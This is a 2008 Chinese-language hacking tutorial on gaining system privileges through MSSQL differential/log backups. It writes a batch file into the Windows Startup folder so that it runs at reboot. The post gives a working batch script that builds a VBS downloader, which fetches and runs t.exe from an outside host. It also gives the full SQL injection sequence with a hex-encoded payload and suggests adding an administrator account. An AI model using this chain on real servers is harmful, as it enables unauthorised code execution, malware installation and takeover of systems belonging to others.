提權思路之MSSQL差異備份取系統(tǒng)權限

更新時間：2008年01月20日 16:01:40 作者：

看了下面的文章，不是讓大家搞破壞，大家可以加強自己服務器的安全性。

MSSQL差異備份獲取webshell 幾乎人人皆知,那么我們可以利用差異備份出來的文件當作惡意代碼
讓系統(tǒng)執(zhí)行了之后自動提升權限或者添加管理員嗎？答案當然可以了,kj021320測試了N次之后跟你說！

那么我們得考慮文件擺放的位置~什么地方系統(tǒng)會運行呢？這個其實算是廢話吧！
大家不用想都知道通用地方 C:\Documents and Settings\All Users\「開始」菜單\程序\啟動
呵呵位置有了！　那么我們備份什么文件讓系統(tǒng)能執(zhí)行的呢？
這個是第一個關鍵點~！
EXE JS VBS BAT這些文件大家第一時間想到的了
那些我一個一個來分析 exe的話！絕對能了！但是 MSSQL差異備份這么多垃圾肯定會把exe弄壞的！
否決掉
然后到腳本
VBS 我們能不能把他的垃圾信息注釋掉呢？不然VBS 會執(zhí)行不了！ OK 學過VBS的朋友都知道
VBS里面有2種注釋 ' 還有就是 rem
但是還是會有垃圾信息屏蔽不了
否決掉

JS呢？ JS里面有多行注釋的/**/ 但是 /* 不可能在首行吧？
否決掉

最后剩下我們最熟悉的bat批處理了！
OK我們繼續(xù)分析 bat里面注釋是什么呢？也是REM,失敗??！之前vbs那里不行這里的rem注釋也一樣不行的！
那么我們怎么辦呢？其實很簡單！當我們在CMD下面敲錯了命令系統(tǒng)會怎樣呢？

說到這里要是大家不往文章下面看也一樣能想到方法了吧~

OK我們繼續(xù)探~~這里是最最關鍵點,差異備份出來的垃圾信息我們可以通過用回車把他提交了！
而系統(tǒng)只當作無用的命令來處理！不影響我們的操作！
問題就這樣解決了嗎？不是的！~MSSQL備份的時候,到一定的字符長度就會出現(xiàn)垃圾的字符,那個字符會影響我們的操作！
那么我們得把語句盡量縮少,越少越好~
OK那我們思路好了就采用bat 寫一個VBS的下載者然后執(zhí)行這個下載者最后通過下載者down回來的馬子來獲取系統(tǒng)權限
下面是我改過的生成下載者的BAT

echo Set P=createObject("Microsoft.XMLHTTP")>k.vbs
echo P.Open "GET","http://www.isto.cn/t.exe",0 >>k.vbs
echo P.Send():set G=createObject("ADODB.Stream")>>k.vbs
echo G.Mode=3:G.Type=1:G.Open() >>k.vbs
echo G.Write P.ResponseBody:G.SaveToFile "t.exe",2 >>k.vbs
k.vbs
t

下一個k.VBS然后k.vbs下載一個t.exe文件保存到本地直接執(zhí)行
記得記得我說過的代碼前面一定要用回車把垃圾數(shù)據(jù)提交最好2以上個回車
然后實現(xiàn)差異備份

alter database ISTO set RECOVERY FULL--
create table cmd (a image)--
backup log ISTO to disk = 'c:\cmd1' with init--
insert into cmd (a) values (0x130A0D0A6563686F2053657420503D6372656174654F626A65637428224D6963726F736F66742E584D4C4854545022293E6B2E7662730D0A6563686F20502E4F70656E2022474554222C22687474703A2F2F7777772E6973746F2E636E2F742E657865222C30203E3E6B2E7662730D0A6563686F20502E53656E6428293A73657420473D6372656174654F626A656374282241444F44422E53747265616D22293E3E6B2E7662730D0A6563686F20472E4D6F64653D333A472E547970653D313A472E4F70656E2829203E3E6B2E76627320200D0A6563686F20472E577269746520502E526573706F6E7365426F64793A472E53617665546F46696C652022742E657865222C32203E3E6B2E7662730D0A6B2E7662730D0A740D0A)--
backup log ISTO to disk = 'C:\Documents and Settings\All Users\「開始」菜單\程序\啟動\1.bat'--
drop table cmd--

OK bat出來了！至于怎樣讓服務器重啟呢！這個問題遺留給你們?nèi)ビ懻摪桑?
要是服務器直接開啟了3389 那就更方便了！直接bat 一個添加管理員的命令更爽！